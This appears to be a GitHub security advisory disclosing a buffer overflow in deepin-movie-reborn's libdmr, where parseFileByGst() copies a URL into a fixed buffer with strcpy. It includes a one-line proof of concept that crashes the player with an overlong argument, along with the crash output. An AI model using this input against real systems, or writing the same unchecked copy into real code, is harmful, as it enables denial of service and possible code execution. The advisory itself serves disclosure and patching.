Skip to content

Buffer Overflow in deepin-movie-reborn/libdmr GstUtils::parseFileByGst()

High
BLumia published GHSA-547m-q9qj-6hch Jun 18, 2024

Package

deepin-movie-reborn

Affected versions

<5.10.50

Patched versions

6.0.8

Description

Summary

parseFileByGst() function in libdmr copies the url provided as an argument to a fixed size buffer using strcpy. If a url longer than the fixed buffer size was provided, the buffer will overflow.

PoC

$ deepin-movie $(python3 -c 'print("A"*1024)')
log path:  "/home/u32i/.cache/deepin/deepin-movie/deepin-movie.log"
No appenders assotiated with category qt.qpa.xcb
[Warning] <> QXcbConnection: XCB error: 5 (BadAtom), sequence: 402, resource id: 0, major code: 20 (GetProperty), minor code: 0
*** buffer overflow detected ***: terminated
Aborted

Impact

A successful explitation of this vulnerability will result in an application level DoS or could result in a remote code execution.

Severity

High

CVE ID

No known CVE

Weaknesses

Credits